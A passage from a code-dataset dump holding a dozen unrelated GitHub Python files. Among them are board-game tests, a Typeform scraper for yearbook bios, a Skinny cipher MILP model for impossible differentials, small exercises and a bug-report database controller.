main()\n","repo_name":"GrinningSoulGH/db-requester","sub_path":"populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"38370263275","text":"import unittest\n\nfrom src.Player import Player, NotEnoughResource\nfrom src.Potion import Potion\nfrom src.ResourceType import ResourceType\nfrom src.Tile import Tile, TileType\n\n\nclass TestPlayer(unittest.TestCase):\n\n def setUp(self) -> None:\n self.player = Player()\n self.tile1 = Tile()\n self.tile2 = Tile()\n self.tile3 = Tile(TileType.HERB, 1)\n self.tile4 = Tile(TileType.MUSHROOM, 2)\n self.tile5 = Tile(TileType.CRYSTAL, 2)\n self.tile6 = Tile(TileType.SPIDER_WEB, 3)\n self.tile1.add_neighbour(self.tile2)\n self.tile2.add_neighbour(self.tile3)\n self.tile3.add_neighbour(self.tile4)\n self.tile3.add_neighbour(self.tile5)\n self.tile5.add_neighbour(self.tile6)\n self.player.tile = self.tile1\n\n def test_gathering_from_town(self):\n self.assertRaises(ValueError, self.player.gather)\n\n def test_gathering_from_not_town(self):\n self.player.tile = self.tile3\n for _ in range(1000):\n self.player.gather()\n self.assertLessEqual(self.player.resources[self.tile3.get_token()], self.tile3.ring)\n self.assertGreaterEqual(self.player.resources[self.tile3.get_token()], 0)\n\n def test_hand_limit(self):\n self.player.resources[ResourceType.SPIDER_WEB] = 8\n self.player.tile = self.tile6\n for _ in range(1000):\n self.player.gather()\n self.assertEqual(10, self.player.sum_resources())\n self.assertEqual(0, self.tile6.resource)\n\n def test_moving(self):\n self.player.move_to(self.tile6)\n self.assertSetEqual({self.player}, self.tile6.players)\n self.assertSetEqual(set(), self.tile1.players)\n self.assertEqual(self.tile6, self.player.tile)\n self.assertEqual(1, self.player.actions)\n\n def test_successful_potion(self):\n self.player.resources = {ResourceType.CRYSTAL: 2, ResourceType.HERB: 1, ResourceType.MUSHROOM: 1,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 2}\n self.player.fulfill_order(Potion.Love)\n self.assertDictEqual({ResourceType.CRYSTAL: 0, ResourceType.HERB: 0, ResourceType.MUSHROOM: 0,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 0}, self.player.resources)\n self.assertIn(Potion.Love, self.player.potions)\n self.assertEqual(4, self.player.actions)\n\n def test_unsuccessful_potion(self):\n self.player.resources = {ResourceType.CRYSTAL: 2, ResourceType.HERB: 1, ResourceType.MUSHROOM: 1,\n ResourceType.SPIDER_WEB: 0, ResourceType.BAT_WING: 1}\n self.assertRaises(NotEnoughResource, self.player.fulfill_order, Potion.Love)\n\n def test_sum_point(self):\n self.player.potions.extend([Potion.Love, Potion.Truth, Potion.EyeColorChanging])\n self.assertEqual(7, self.player.sum_point())\n\n","repo_name":"banderasz/WitchGuild","sub_path":"test/TestPlayer.py","file_name":"TestPlayer.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"35813267633","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nfrom io import StringIO\nimport numpy as np\nimport pandas as pd\nimport os\nimport re\nfrom requests import session\n\n# UTC times\nSENIOR_BIOFORM_OPEN_DATE = '2017-04-01 00:00:00'\n\npayload = {\n 'action': 'btnlogin',\n '_username': os.environ['TYPEFORM_USERNAME'],\n '_password': os.environ['TYPEFORM_PASSWORD']\n }\n\nhouses = ['Adams', 'Cabot', 'Currier', 'Dudley', 'Dunster', 'Eliot', 
'Kirkland',\n 'Leverett', 'Lowell', 'Mather', 'Pforzheimer', 'Quincy', 'Winthrop']\n\n#### SENIORS ####\n'''removes extracurriculars with brackets in their name (e.g. Harvard Yearbook Publications [HYP])'''\ndef remove_brackets(string):\n return re.sub('[ ][\\[].*?[\\]]', '', string)\n\n'''capitalizes first letter of each word very carefully'''\ndef title(string):\n if string:\n string = ' '.join(word[0].upper() + word[1:] for word in string.split())\n for word in ['and', 'the', 'in', 'of', 'on', 'at', 'by', 'to', 'off', 'for', 'between', 'with', 'through', 'out', 'a', 'an']:\n string = string.replace(' {} '.format(word.capitalize()), ' {} '.format(word))\n string = string[0].upper() + string[1:]\n return string\n\ndef get_full_name(row):\n full_name = row['First Name'].title() + ' '\n if row['Middle Name']:\n if len(row['Middle Name']) == 1:\n full_name += row['Middle Name'] + '. '\n else:\n full_name += row['Middle Name'] + ' '\n full_name += row['Last Name']\n if row['Suffix']:\n if 'J' in row['Suffix'].upper():\n full_name += ', Jr.'# + row['Suffix']\n else:\n full_name += ' ' + row['Suffix']\n return full_name \n\ndef edit_school_name(schoolname):\n # bunch of rules\n schoolname = schoolname.replace(' Junior High School', ' High School')\n schoolname = schoolname.replace(' Senior High School', ' High School')\n schoolname = schoolname.replace(' Senior High School', ' High School')\n schoolname = schoolname.replace('Saint ', 'St. ')\n schoolname = schoolname.replace('Mount ', 'Mt. ')\n schoolname = schoolname.replace(' HS', ' High School')\n schoolname = schoolname.replace(' & ', ' and ')\n schoolname = schoolname.replace(' HS', ' High School')\n schoolname = schoolname.replace(' H.S.', ' High School')\n schoolname = schoolname.replace(' H. S.', ' High School')\n\n if schoolname == 'Andover' or 'Phillips Andover' in schoolname:\n schoolname = 'Phillips Academy'\n elif schoolname == 'Exeter' or 'Phillips Exeter' in schoolname:\n schoolname = 'Phillips Exeter Academy'\n elif schoolname == 'Collegiate':\n schoolname = 'Collegiate School'\n schoolname = schoolname.replace('Thomas Jefferson High School for Science and Technology', 'Thomas Jefferson High School')\n\n return schoolname\n\ndef edit_city_name(city):\n if city.lower() in ['new york city', 'ny', 'nyc']:\n city = 'New York'\n\n return city\n\ndef edit_country_name(country):\n if country.lower() in ['u.k.', 'uk', 'northern ireland', 'scotland', 'wales', 'england']:\n country = 'United Kingdom'\n\n return country\n\ndef get_bio_string(row):\n bio = ''\n if row['Date of Birth']:\n birthdate = datetime.strptime(row['Date of Birth'], '%Y-%m-%d')\n if birthdate.year < 1900:\n birthdate = birthdate.replace(year=1900)\n birthdate = birthdate.strftime('%B %-d, %Y')\n # birthdate.replace(' 0', ' ')\n bio += 'Born on: {}. '.format(birthdate)\n\n if row['Secondary School Name']:\n schoolname = edit_school_name(row['Secondary School Name'])\n\n bio += 'Secondary School: ' + title(schoolname) + '. '\n\n # if need to automatically capitalize, then str.title() will work\n if row['Town/City']: \n city = edit_city_name(row['Town/City'])\n country = edit_country_name(row['Country'])\n \n \n bio += 'Hometown: ' + title(city) + ', ' + row['State/Territory'] + title(country) + '. 
'\n\n # could be done more efficiently but whatever\n bio += 'Field of Concentration: ' \n if row['Concentration Type'] == 'Regular':\n bio += row['Concentration']\n elif row['Concentration Type'] == 'Joint':\n # need to go to Typeform to find this number\n bio += row['Joint Concentration in'] + ' & ' + row['Joint Concentration in {{answer_44252884}} and']\n else:\n bio += row['Concentration.1']\n bio += '. '\n\n if row['Secondary Field']:\n bio += 'Secondary Field: ' + row['Secondary Field'] + '. '\n\n for prize in ['Detur Prize', \n 'Junior Phi Beta Kappa', \n 'Phi Beta Kappa', \n 'John Harvard Scholar', \n 'Harvard College Scholar']:\n if row[prize]:\n bio += prize + '. '\n\n # extracurriculars\n activities = ['Varsity Sport', 'House Activity', 'Activity', 'Club Sport', 'Officer/Leadership Position', 'On-Campus Job', 'Lab or Department Name']\n ec_list = list(row.select(lambda x: x.split('.')[0] in activities))\n\n if ec_list:\n ec = []\n\n for i in xrange(0, len(ec_list), 2):\n if ec_list[i] and ec_list[i + 1]:\n ec.append(ec_list[i] + ' (' + title(ec_list[i + 1]) + ')')\n elif ec_list[i]:\n ec.append(ec_list[i])\n\n # PBHA processing\n pbha = [element.replace('PBHA (', '').replace('Phillips Brooks House Association (', '')\n .replace(')', '')\n .replace(' [PBHA]', '') \n for element in ec\n if '[PBHA]' in element]\n pbha = [element.replace(' (', ': ') + ';' for element in pbha]\n pbha = 'Phillips Brooks House Association (' + ' '.join(pbha)[:-1] + '). '\n\n ec_str = ''\n for element in ec:\n if '[PBHA]' in element:\n ec_str += pbha\n pbha = ''\n # do something\n else:\n # fix Elena's problems\n if element.startswith('Harvard Crimson'):\n element = element.replace('Harvard Crimson', 'The Harvard Crimson')\n if 'Harvard Crimson' in element:\n element = element.replace(' (Associate Editor)', '') \n element = element.replace(', Associate Editor', '') \n element = element.replace('Associate Editor, ', '') \n element = element.replace('Harvard Yearbook Publications, Inc.', 'Harvard Yearbook Publications')\n if element.startswith('Intramurals'):\n element = element.replace('House ', '')\n for house in houses:\n element = element.replace(house + ' ', '')\n\n\n ec_str += element + '. '\n \n ec_str = ec_str.replace(' ', ' ')\n ec_str = remove_brackets(ec_str)\n bio += ec_str\n return bio[:525]\n\ndef get_senior_info(row):\n new_info = [get_full_name(row), \n get_bio_string(row), \n row['House'][:-6], \n row['First Name'], \n row['Last Name'],\n row['Email'],\n row['Submit Date (UTC)']\n ]\n return pd.Series(new_info)\n\ndef download_seniors():\n\n with session() as c:\n c.post('https://admin.typeform.com/login_check', data=payload)\n response = c.get('https://admin.typeform.com/form/3146280/analyze/csv')\n \n seniors = pd.read_csv(StringIO(response.text), dtype=str, encoding='utf-8')\n\n # keep only this year's bioforms\n seniors = seniors[seniors['Start Date (UTC)'] > SENIOR_BIOFORM_OPEN_DATE]\n\n # replace all NaNs\n seniors = seniors.fillna('')\n\n # strip all leading and trailing whitespace\n seniors = seniors.applymap(lambda x: x.strip('. 
'))\n\n # drop all the yes/no stuff\n seniors = seniors.select(lambda x: not x.startswith('Are you '), axis=1)\n\n # drop duplicates (overrides with most recent submission)\n seniors = seniors.drop_duplicates(subset=['Email'], keep='last')\n\n return seniors\n\ndef get_seniors():\n seniors = download_seniors()\n\n # construct output row\n seniors = seniors.apply(get_senior_info, axis=1)\n seniors.columns = ['fullname', 'bio', 'house', 'first_name', 'last_name', 'email', 'time_submitted']\n \n return seniors.to_csv(index_label='id', encoding='utf-8')\n#### END SENIORS ####\n\n#### GROUPS ####\ndef format_officers(row):\n # officer formatting\n officer_list = list(row.select(lambda x: x.startswith('Officer Position') or x.endswith('Full Name')))\n officers = []\n for i in xrange(0, len(officer_list), 2):\n if officer_list[i] and officer_list[i + 1]:\n officers.append(title(officer_list[i]) + ': ' + title(officer_list[i + 1]) + '; ')\n \n return ''.join(officers)[:-2]\n\ndef get_groups_info(row):\n new_info = [remove_brackets(row['Group Name']), \n row['Organization Description'][:750], \n format_officers(row),\n row['Submit Date (UTC)']\n ]\n return pd.Series(new_info)\n\ndef get_groups():\n with session() as c:\n c.post('https://admin.typeform.com/login_check', data=payload)\n response = c.get('https://admin.typeform.com/form/3146326/analyze/csv')\n\n groups = pd.read_csv(StringIO(response.text), dtype=str, encoding='utf-8')\n\n # keep only this year's bioforms\n groups = groups[groups['Start Date (UTC)'] > SENIOR_BIOFORM_OPEN_DATE]\n\n # replace all NaNs\n groups = groups.fillna('')\n\n # strip all leading and trailing whitespace\n groups = groups.applymap(lambda x: x.strip())\n\n # drop duplicates (overrides with most recent submission)\n groups = groups.drop_duplicates(subset=['Group Name'], keep='last')\n \n # construct output row\n groups = groups.apply(get_groups_info, axis=1)\n groups.columns = ['name', 'blurb', 'officers', 'time_submit']\n \n return groups.to_csv(index_label='id', encoding='utf-8')\n#### END GROUPS ####\n\n#### PROFS ####\ndef process_profs():\n seniors = download_seniors()\n\n profs = seniors[['Professor\\'s First Name', \n 'Professor\\'s Last Name',\n 'Professor\\'s Email', \n 'Professor\\'s Department']]\n profs.columns = ['first_name', 'last_name', 'email', 'dept']\n\n # omit everyone who skipped the question\n to_omit = ['', 'n/a', 'omit', ' ', ' ', '.', '-', 'x', 'na', 'a', 'asdf', 'X', 'first', 'First', 'no', 'No']\n profs = profs.applymap(lambda x : np.nan if x in to_omit else x).dropna()\n\n # sort alphabetically\n profs = profs.sort_values(['last_name', 'first_name'], axis=0)\n\n return profs\n \ndef get_profs():\n profs = process_profs()\n profs.columns = ['first_name', 'last_name', 'email', 'dept']\n \n return profs.to_csv(encoding='utf-8') \n\ndef get_prof_counts():\n\n profs = process_profs()\n prof_counts = profs['last_name'].value_counts()\n \n return prof_counts.to_csv(encoding='utf-8')\n#### END PROFS ####\n","repo_name":"rlouyang/hyp-bioform-flask","sub_path":"hypbioform.py","file_name":"hypbioform.py","file_ext":"py","file_size_in_byte":11016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39988069498","text":"\"\"\"\nClasses from the 'UserManagement' framework.\n\"\"\"\n\ntry:\n from rubicon.objc import ObjCClass\nexcept ValueError:\n\n def ObjCClass(name):\n return None\n\n\ndef _Class(name):\n try:\n return ObjCClass(name)\n except NameError:\n return None\n\n\nUMUserPersonaContext 
= _Class(\"UMUserPersonaContext\")\nUMUser = _Class(\"UMUser\")\nUMMutableUser = _Class(\"UMMutableUser\")\nUMUserSwitchContext = _Class(\"UMUserSwitchContext\")\nUMPersonaCallbackListener = _Class(\"UMPersonaCallbackListener\")\nUMXPCServer = _Class(\"UMXPCServer\")\nUMLogMessage = _Class(\"UMLogMessage\")\nUMUserPersonaAttributes = _Class(\"UMUserPersonaAttributes\")\nUMLog = _Class(\"UMLog\")\nUMAbort = _Class(\"UMAbort\")\nUMTask = _Class(\"UMTask\")\nUMUserSyncTask = _Class(\"UMUserSyncTask\")\nUMUserSwitchBlockingTask = _Class(\"UMUserSwitchBlockingTask\")\nUMError = _Class(\"UMError\")\nUMQueue = _Class(\"UMQueue\")\nUMUserPersona = _Class(\"UMUserPersona\")\nUMUserMutablePersona = _Class(\"UMUserMutablePersona\")\nUMMobileKeyBag = _Class(\"UMMobileKeyBag\")\nUMUserManager = _Class(\"UMUserManager\")\n","repo_name":"ColdGrub1384/Pyto","sub_path":"Lib/objc/_UserManagement.py","file_name":"_UserManagement.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":824,"dataset":"github-code","pt":"42"} +{"seq_id":"18437968404","text":"import re, os\n\nos.chdir(r'C:\\workspace\\Doit_python\\03\\data')\n\nf = open('friends101.txt', 'r', encoding='utf8')\nscript101 = f.read()\nprint(script101[:100])\n\n# 'Monica:' 다음 아무 문자나 반복되는 (.+) 패턴을 찾아 리스트로 반환\nLine = re.findall(r'Monica:.+', script101)\nprint(Line[:3])\n\nfor item in Line[:3] :\n print(item)\n\nf = open('monica.txt', 'w', encoding='utf8')\n\nmonica = ''\nfor i in Line :\n monica += i + '\\n'\nf.write(monica)\n\n","repo_name":"Yerial1125/Doit_python","sub_path":"03/03_monica.py","file_name":"03_monica.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"2828315473","text":"from functools import WRAPPER_ASSIGNMENTS\nimport torch\n\nfrom ptls.nn.normalization import L2NormEncoder\nfrom ptls.data_load.padded_batch import PaddedBatch\n\n\ndef _pb_shell(cls):\n class PBShell(cls):\n def __init__(self, *args, **kwargs):\n for attr in WRAPPER_ASSIGNMENTS:\n setattr(self, attr, getattr(cls, attr))\n super().__init__(*args, **kwargs)\n\n def forward(self, x: PaddedBatch):\n return PaddedBatch(super().forward(x.payload), x.seq_lens)\n\n return PBShell\n\n\nPBDropout = _pb_shell(torch.nn.Dropout)\nPBLinear = _pb_shell(torch.nn.Linear)\nPBLayerNorm = _pb_shell(torch.nn.LayerNorm)\nPBReLU = _pb_shell(torch.nn.ReLU)\nPBL2Norm = _pb_shell(L2NormEncoder)\n","repo_name":"dllllb/pytorch-lifestream","sub_path":"ptls/nn/pb.py","file_name":"pb.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"42"} +{"seq_id":"74002502526","text":"inf = float('inf')\ndef solution():\n for _ in range(int(input())):\n n = int(input())\n A = list(reversed(list(map(int, input().split()))))\n\n Seen = set()\n ii = 0\n while ii < n:\n if A[ii] in Seen:\n break\n Seen.add(A[ii])\n ii += 1\n print(n-ii)\n\n\nif __name__ == \"__main__\":\n solution()","repo_name":"thatpythonguys/CP","sub_path":"CF Round 811/B_Remove_Prefix.py","file_name":"B_Remove_Prefix.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"510248326","text":"import gurobipy\nfrom primitive import AesLike\nfrom itertools import product as itp\nfrom itertools import starmap as itsm\nimport utilities\n\nshift_rows = [0, 1, 2, 3, 7, 4, 5, 6, 10, 11, 8, 9, 13, 14, 15, 
12]\n\nmixcol_equiv = [\n [0, 0, 0, 1, 1, 0, 0, 1],\n [1, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 0, 0, 0, 1],\n]\n\nmixcol_origin = [\n [1, 0, 1, 1, 1, 0, 0, 0],\n [1, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 0, 0, 0, 1],\n]\n\n\nclass Skinny(AesLike):\n \"\"\" Gurobi Model for Skinny-128 differential trails. \"\"\"\n\n def __init__(self, nb_rounds, sbox_file, mixcol=\"equiv\"):\n\n # Different choices of MixColumns models.\n if mixcol == \"equiv\":\n self.mixcol = mixcol_equiv\n else:\n self.mixcol = mixcol_origin\n AesLike.__init__(self, 128, nb_rounds, sbox_file)\n\n def linear_layer(self, x_in, x_out):\n x_in = [\n x_in[(8 * shift_rows[i // 8]) + (i % 8)] for i in range(128)\n ] # variables after the shift_rows, at the input of mixcol\n\n for col, bit in itp(range(4), range(8)):\n bit_list = [x_in[(32 * row) + (8 * col) + bit] for row in range(4)] + [\n x_out[(32 * row) + (8 * col) + bit] for row in range(4)\n ]\n\n self.add_bin_matrix_constr(\n self.mixcol, bit_list, 0, mode=\"binary\",\n )\n\n\ndef lin_layer(x):\n \"\"\" Skinny linear layer implementation for testing purposes. \"\"\"\n # Collect in cells\n nib = {}\n for i in range(16):\n nib[i] = (x >> (8 * i)) & 0xFF\n\n # Shift rows\n nib2 = {}\n for row in range(4):\n for j in range(4):\n nib2[(4 * row) + ((j + row) % 4)] = nib[(4 * row) + j]\n\n # Collect in rows\n row = {}\n for i in range(4):\n row[i] = 0\n for j in range(4):\n row[i] ^= nib2[(4 * i) + j] << (8 * j)\n\n # Mixcolumns\n row[1] ^= row[2]\n row[2] ^= row[0]\n row[3] ^= row[2]\n\n row2 = {}\n for i in range(4):\n row2[i] = row[(i - 1) % 4]\n\n # Collect in int\n out = 0\n for i in range(4):\n out ^= row2[i] << (32 * i)\n\n return out\n\n\ndef test_linear_layer():\n \"\"\"\n Testing the modeling of the linear layer with identity Sbox.\n \"\"\"\n n = 10\n mid = Skinny(n, \"identity_sbox_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n y = x\n for j in range(n - 1):\n y = lin_layer(y)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(the_set, message=\"Linear layer test.\")\n assert len(res) == 0\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n y = x\n for j in range(n - 1):\n y = lin_layer(y)\n the_set.add((x, y ^ 1))\n\n res = mid.search_impossible_diff(the_set, message=\"Linear layer test.\")\n assert len(res) == 16\n\n print(\"Linear layer test OK.\")\n\n\ndef test_paper_single_impossible_diff():\n \"\"\"\n Testing the model with arbitrary Sbox against\n the truncated impossible differential trail given in the\n eprint paper:\n The SKINNY Family of Block Ciphers and its Low-Latency Variant MANTIS.\n from the authors of Skinny.\n \"\"\"\n n = 11\n mid = Skinny(n, \"arbitrary_sbox_8_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n x = 1 << (8 * 12)\n y = 1 << (8 * 7)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(\n the_set, message=\"Paper single impossible differential.\"\n )\n assert len(res) == 1\n\n print(\"Single impossible differential OK.\")\n\n\ndef test_paper_all_impossible_diff():\n \"\"\"\n Same as above with all the impossible differentials.\n \"\"\"\n n = 12\n mid = Skinny(n, \"arbitrary_sbox_8_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n for j in range(16):\n y = 1 << (8 * j)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(the_set, message=\"Paper impossible differentials.\")\n\n assert len(res) == 
12\n\n print(\"All impossible differentials test OK.\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n This section aims at testing this MIP model of Skinny\n for impossible differential search.\n \"\"\"\n test_linear_layer()\n test_paper_single_impossible_diff()\n test_paper_all_impossible_diff()\n","repo_name":"dnlcog/efficient_milp_modelings","sub_path":"impossible_differentials/skinny.py","file_name":"skinny.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"42"} +{"seq_id":"4402508852","text":"\"\"\"\nA imobiliária XYZ vende apenas terrenos\nretangulares. Faça um programa para ler\nas dimensões de um terreno e exibir a\nárea do mesmo.\n\"\"\"\nladoA = int(input(\"Lado A : \"))\nladoB = int(input(\"Lado B : \"))\narea = ladoA * ladoB\nprint(f\"{area}\")","repo_name":"alanabclins/LearningPython","sub_path":"codes/2.Introducao/imobiliaria.py","file_name":"imobiliaria.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8759033674","text":"\"\"\"!\n@file slic_to_recon_job.py\n\nSimulation of signals in detector (using SLIC) and readout.\nThe simulation is followed by reconstruction of the events.\n\"\"\"\nimport os\nfrom hpsmc.tools import SLIC, JobManager, ExtractEventsWithHitAtHodoEcal\n\n## Get job input file targets\ninputs = list(job.input_files.values())\n\njob.description = 'slic to recon'\n\n## event_int needs to be set to 250 for beam files; should be = 1 for signal files\nif 'event_interval' in job.params:\n event_int = job.params['event_interval']\nelse:\n event_int = 1\n\nif 'nevents' in job.params:\n nevents = job.params['nevents']\nelse:\n nevents = 10000\n\nif 'base_name' in job.params:\n base_name = job.params['base_name']\nelse:\n base_name = ''\n\n## Input beam events (StdHep format)\nslic_file_names = []\nfor i in range(len(inputs)):\n filename, file_extension = os.path.splitext(inputs[i])\n slic_file = filename + '.slcio'\n slic_file_names.append(slic_file)\n\n## Simulate beam events\nslic_comps = []\nfor i in range(len(inputs)):\n slic_comps.append(SLIC(inputs=[inputs[i]],\n outputs=[slic_file_names[i]],\n nevents=nevents * event_int,\n ignore_job_params=['nevents'])\n )\n\n## concatenate beam events before merging\ncat_out_name = base_name + '_slic_cat.slcio'\nslic_cat = ExtractEventsWithHitAtHodoEcal(inputs=slic_file_names,\n outputs=[cat_out_name],\n event_interval=0, num_hodo_hits=0)\n\n## Run simulated events in readout to generate triggers\nreadout_out_name = base_name + '_readout.slcio'\nreadout = JobManager(steering='readout',\n inputs=slic_cat.output_files(),\n outputs=[readout_out_name])\n\n## Run physics reconstruction\nrecon_out_name = base_name + '_recon.slcio'\nrecon = JobManager(steering='recon',\n inputs=readout.output_files(),\n outputs=[recon_out_name])\n\n## Add the components\ncomps = slic_comps\ncomps.extend([slic_cat, readout, recon])\njob.add(comps)\n","repo_name":"JeffersonLab/hps-mc","sub_path":"python/jobs/slic_to_recon_job.py","file_name":"slic_to_recon_job.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"70936887486","text":"from opentelemetry import trace\n\n\ntracer = trace.get_tracer(__name__)\n\n\nclass CurrentSpan:\n \"\"\"\n Wraps open telemetry start_as_current_span method.\n Intention to have this class is supporting of enabled flag to does 
nothing\n if open telemtry is disabled on application level.\n\n \"\"\"\n def __init__(self, span_name, enabled):\n self.span_name = span_name\n self.enabled = enabled\n\n def __enter__(self):\n if not self.enabled:\n return\n self.trace = tracer.start_as_current_span(self.span_name)\n self.trace.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if not self.enabled:\n return\n self.trace.__exit__(exc_type, exc_val, exc_tb)\n","repo_name":"broHeryk/sqall-fork","sub_path":"squall/opentelemetry/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43006879080","text":"\nimport numpy as np\nfrom numpy import array\nfrom math import pi\n\n# argmin function\ndef argmin(lst):\n return min(range(len(lst)), key=lst.__getitem__)\n\n# Ackley function\n## Input: array(D, ) -> float\ndef ackley_f(x):\n x = x.reshape(-1)\n lhs = 20 * np.exp((-0.2) * np.sqrt(np.mean((x ** 2))))\n rhs = np.exp(np.mean(np.cos(2 * pi * x)))\n result = -1 * (lhs + rhs) + 20 + np.exp(array([1]))\n return result.item()\n\n# Weierstrass function\n## Input: array(D, ) -> float\ndef weierstrass_f(x, a=0.5, b=3, kmax=20):\n x = (x * 0.5) / 100\n x = x.reshape(-1)\n D = x.shape[0]\n\n lhs = 0\n rhs = 0\n for k in range(kmax):\n lhs += np.sum((a ** k) * np.cos(2 * pi * (b ** k) * (x + 0.5)))\n rhs += (a ** k) * np.cos(array([pi * (b ** k)]))\n result = lhs - D * rhs + 600\n return result.item()","repo_name":"Quan-En/Optimization","sub_path":"assignment3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"31436002793","text":"\"\"\"Module for controllers.\"\"\"\nfrom datetime import datetime\nimport json\n\nfrom exceptions import NoReportsFound, ReportAlreadyExists, ReportNotFound\nfrom models import Report, TokenizedReport\nfrom sidrd import SIDRD\n\n# CRUD Reports\n\ndef get_report(report_id: int) -> Report:\n \"\"\"\n Get a report from the database.\n Args:\n report_id: id of the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = get_report(12345)\n \"\"\"\n report = Report.get(report_id) # May raise ReportNotFound\n return report\n\ndef get_reports(filters: dict = {}, limit: int = 100) -> list:\n \"\"\"\n Get limit reports from the database.\n Args:\n filters: dict, filters to apply to the reports.\n Available fields: report_id, dupe_of, status, component, creation_time\n Must be strings\n limit: limit of the number of reports to get.\n Returns:\n reports: list of reports (Report)\n Exceptions:\n NoReportsFound. If there are no reports in the database.\n Example:\n >>> reports = get_reports(filters={\"dupe_of\": \"None\"}, limit=10)\n \"\"\"\n reports = Report.get_reports(filters, limit) # May raise NoReportsFound\n return reports\n\ndef create_report(report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list) -> Report:\n \"\"\"\n Create a report in the database.\n Args:\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. 
None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportAlreadyExists. If the report already exists.\n Example:\n >>> report = create_report(report)\n \"\"\"\n report = Report.insert(report_id, creation_time, \n status, component, dupe_of, \n summary, comments) # May raise ReportAlreadyExists\n return report\n\ndef create_many_reports(reports: list) -> int:\n \"\"\"\n Create many reports in the database.\n Args:\n reports: list of reports (Report)\n Returns:\n reports: number of reports created.\n Example:\n >>> reports = create_many_reports([{'report_id': 1, 'creation_time': ...}, ...])\n \"\"\"\n inserted_reports = 0\n\n if reports:\n for rp in reports:\n report = Report(**rp) if type(rp) == dict else rp\n try:\n create_report(report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments) # May raise ReportAlreadyExists\n inserted_reports += 1\n except ReportAlreadyExists:\n pass\n \n return inserted_reports\n\ndef update_report(_id: int, report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text: str, tokens: list) -> Report:\n \"\"\"\n Update a report in the database.\n Args:\n _id: mongo id of the report.\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = update_report(12345, 657,...)\n \"\"\"\n report = TokenizedReport.update(_id, report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportNotFound\n return report\n\ndef delete_report(report_id: int) -> None:\n \"\"\"\n Delete a report from the database.\n Args:\n report_id: report_id of the report.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> delete_report(12345)\n \"\"\"\n return Report.delete(report_id=report_id) # May raise ReportNotFound\n\ndef delete_all_reports() -> int:\n \"\"\"\n Delete all reports from the database.\n Returns:\n int: number of reports deleted.\n Example:\n >>> num_deleted = delete_all_reports()\n \"\"\"\n return Report.delete_all() # May raise NoReportsFound\n\n###############################################################################\n\n# SIDRD Update\n\n\ndef get_tokenized_report(report_id: int) -> TokenizedReport:\n \"\"\"\n Get a report from the database.\n Args:\n report_id: id of the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = get_tokenized_report(12345)\n \"\"\"\n report = TokenizedReport.get(report_id) # May raise ReportNotFound\n return report\n\ndef get_tokenized_reports(filters: dict = {}, limit: int = 5000) -> list:\n \"\"\"\n Get all tokenized reports from the database.\n Args:\n limit: limit of the number of reports to get.\n Returns:\n reports: list of reports 